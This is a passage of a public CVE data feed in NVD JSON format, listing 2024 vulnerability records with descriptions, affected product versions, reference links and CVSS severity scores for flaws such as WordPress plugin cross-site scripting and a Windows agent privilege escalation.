"cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7201:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7202:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:*:*:*:*:*:*:*:*", "versionEndExcluding" : "7.2", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7200:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7250:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7203:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7210:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7211:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7212:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7213:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7215:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7220:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7260:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7251:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7270:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-02T13:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0254", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/guest-author-name/trunk/sfly-guest-author.php", "name" : "https://plugins.trac.wordpress.org/browser/guest-author-name/trunk/sfly-guest-author.php", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/guest-author-name/trunk/sfly-guest-author.php", "name" : "https://plugins.trac.wordpress.org/browser/guest-author-name/trunk/sfly-guest-author.php", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027723%40guest-author-name&new=3027723%40guest-author-name&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027723%40guest-author-name&new=3027723%40guest-author-name&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027723%40guest-author-name&new=3027723%40guest-author-name&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027723%40guest-author-name&new=3027723%40guest-author-name&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0e9e2864-6624-497f-8bec-df8360ed3f4a?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0e9e2864-6624-497f-8bec-df8360ed3f4a?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0e9e2864-6624-497f-8bec-df8360ed3f4a?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0e9e2864-6624-497f-8bec-df8360ed3f4a?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The (Simply) Guest Author Name plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's post meta in all versions up to, and including, 4.34 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:shooflysolutions:\\(simply\\)_guest_author_name:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "4.34", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-05T22:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0255", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php#L52", "name" : "https://plugins.trac.wordpress.org/browser/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php#L52", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php#L52", "name" : "https://plugins.trac.wordpress.org/browser/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php#L52", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php", "name" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php", "name" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/53a51408-e5d8-4727-9dec-8321c062c31e?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/53a51408-e5d8-4727-9dec-8321c062c31e?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/53a51408-e5d8-4727-9dec-8321c062c31e?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/53a51408-e5d8-4727-9dec-8321c062c31e?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wprm-recipe-text-share' shortcode in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:bootstrapped:wp_recipe_maker:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "9.1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-05T22:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0256", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3029599/starbox", "name" : "https://plugins.trac.wordpress.org/changeset/3029599/starbox", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3029599/starbox", "name" : "https://plugins.trac.wordpress.org/changeset/3029599/starbox", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0eafe473-9177-47c4-aa1e-2350cb827447?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0eafe473-9177-47c4-aa1e-2350cb827447?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0eafe473-9177-47c4-aa1e-2350cb827447?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0eafe473-9177-47c4-aa1e-2350cb827447?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Starbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Profile Display Name and Social Settings in all versions up to, and including, 3.4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:squirrly:starbox:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.5.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-07T05:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0257", "ASSIGNER" : "ics-cert@hq.dhs.gov" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-107-04", "name" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-107-04", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-107-04", "name" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-107-04", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "\nRoboDK v5.5.4\n\n is vulnerable to heap-based buffer overflow while processing a specific project file. The resulting memory corruption may crash the application.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-04-17T20:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0258", "ASSIGNER" : "product-security@apple.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "http://seclists.org/fulldisclosure/2024/Mar/21", "name" : "http://seclists.org/fulldisclosure/2024/Mar/21", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "http://seclists.org/fulldisclosure/2024/Mar/21", "name" : "http://seclists.org/fulldisclosure/2024/Mar/21", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "http://seclists.org/fulldisclosure/2024/Mar/24", "name" : "http://seclists.org/fulldisclosure/2024/Mar/24", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "http://seclists.org/fulldisclosure/2024/Mar/24", "name" : "http://seclists.org/fulldisclosure/2024/Mar/24", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "http://seclists.org/fulldisclosure/2024/Mar/25", "name" : "http://seclists.org/fulldisclosure/2024/Mar/25", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "http://seclists.org/fulldisclosure/2024/Mar/25", "name" : "http://seclists.org/fulldisclosure/2024/Mar/25", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "https://support.apple.com/en-us/HT214081", "name" : "https://support.apple.com/en-us/HT214081", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://support.apple.com/en-us/HT214081", "name" : "https://support.apple.com/en-us/HT214081", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://support.apple.com/en-us/HT214084", "name" : "https://support.apple.com/en-us/HT214084", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://support.apple.com/en-us/HT214084", "name" : "https://support.apple.com/en-us/HT214084", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://support.apple.com/en-us/HT214086", "name" : "https://support.apple.com/en-us/HT214086", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://support.apple.com/en-us/HT214086", "name" : "https://support.apple.com/en-us/HT214086", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://support.apple.com/en-us/HT214088", "name" : "https://support.apple.com/en-us/HT214088", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://support.apple.com/en-us/HT214088", "name" : "https://support.apple.com/en-us/HT214088", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The issue was addressed with improved memory handling. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4, watchOS 10.4. An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:apple:ipad_os:*:*:*:*:*:*:*:*", "versionEndExcluding" : "17.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding" : "17.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding" : "14.0", "versionEndExcluding" : "14.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*", "versionEndExcluding" : "17.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*", "versionEndExcluding" : "10.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.6, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 6.0 } }, "publishedDate" : "2024-03-08T02:15Z", "lastModifiedDate" : "2025-03-17T16:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0259", "ASSIGNER" : "security.reports@fortra.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-276" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://hstechdocs.helpsystems.com/releasenotes/Content/_ProductPages/Robot/RobotScheduleEnterprise.htm", "name" : "https://hstechdocs.helpsystems.com/releasenotes/Content/_ProductPages/Robot/RobotScheduleEnterprise.htm", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://hstechdocs.helpsystems.com/releasenotes/Content/_ProductPages/Robot/RobotScheduleEnterprise.htm", "name" : "https://hstechdocs.helpsystems.com/releasenotes/Content/_ProductPages/Robot/RobotScheduleEnterprise.htm", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://www.fortra.com/security/advisory/fi-2024-005", "name" : "https://www.fortra.com/security/advisory/fi-2024-005", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.fortra.com/security/advisory/fi-2024-005", "name" : "https://www.fortra.com/security/advisory/fi-2024-005", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Fortra's Robot Schedule Enterprise Agent for Windows prior to version 3.04 is susceptible to privilege escalation. A low-privileged user can overwrite the service executable. When the service is restarted, the replaced binary runs with local system privileges, allowing a low-privileged user to gain elevated privileges.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fortra:robot_schedule:*:*:*:*:enterprise:*:*:*", "versionEndExcluding" : "3.04", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.3, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.3, "impactScore" : 5.9 } }, "publishedDate" : "2024-03-28T15:15Z", "lastModifiedDate" : "2025-04-09T15:42Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0260", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://mega.nz/file/yEsSwK6D#--ygVt0NtzhZdqVxvjaPLCYfnIeBSyf76KaRozOxfVo", "name" : "https://mega.nz/file/yEsSwK6D#--ygVt0NtzhZdqVxvjaPLCYfnIeBSyf76KaRozOxfVo", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://mega.nz/file/yEsSwK6D#--ygVt0NtzhZdqVxvjaPLCYfnIeBSyf76KaRozOxfVo", "name" : "https://mega.nz/file/yEsSwK6D#--ygVt0NtzhZdqVxvjaPLCYfnIeBSyf76KaRozOxfVo", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249816", "name" : "https://vuldb.com/?ctiid.249816", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249816", "name" : "https://vuldb.com/?ctiid.249816", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249816", "name" : "https://vuldb.com/?id.249816", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249816", "name" : "https://vuldb.com/?id.249816", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, was found in SourceCodester Engineers Online Portal 1.0. Affected is an unknown function of the file change_password_teacher.php of the component Password Change. The manipulation leads to session expiration. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249816." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:engineers_online_portal_project:engineers_online_portal:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-07T00:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0261", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://packetstormsecurity.com/files/176342/FTPDMIN-0.96-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/176342/FTPDMIN-0.96-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://packetstormsecurity.com/files/176342/FTPDMIN-0.96-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/176342/FTPDMIN-0.96-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.249817", "name" : "https://vuldb.com/?ctiid.249817", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.249817", "name" : "https://vuldb.com/?ctiid.249817", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.249817", "name" : "https://vuldb.com/?id.249817", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249817", "name" : "https://vuldb.com/?id.249817", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.youtube.com/watch?v=q-CVJfYdd-g", "name" : "https://www.youtube.com/watch?v=q-CVJfYdd-g", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://www.youtube.com/watch?v=q-CVJfYdd-g", "name" : "https://www.youtube.com/watch?v=q-CVJfYdd-g", "refsource" : "", "tags" : [ "Exploit" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in Sentex FTPDMIN 0.96 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component RNFR Command Handler. The manipulation leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249817 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ftpdmin_project:ftpdmin:0.96:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-07T02:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0262", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://mega.nz/file/zEsxyIYQ#re6pHT-2OGX9SNk1OpygDCQYu1RpBiOrQ_2QS6beRos", "name" : "https://mega.nz/file/zEsxyIYQ#re6pHT-2OGX9SNk1OpygDCQYu1RpBiOrQ_2QS6beRos", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://mega.nz/file/zEsxyIYQ#re6pHT-2OGX9SNk1OpygDCQYu1RpBiOrQ_2QS6beRos", "name" : "https://mega.nz/file/zEsxyIYQ#re6pHT-2OGX9SNk1OpygDCQYu1RpBiOrQ_2QS6beRos", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.249818", "name" : "https://vuldb.com/?ctiid.249818", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249818", "name" : "https://vuldb.com/?ctiid.249818", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249818", "name" : "https://vuldb.com/?id.249818", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249818", "name" : "https://vuldb.com/?id.249818", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Online Job Portal 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /Admin/News.php of the component Create News Page. The manipulation of the argument News with the input leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249818 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:projectworlds:online_job_portal:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-07T02:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0263", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" 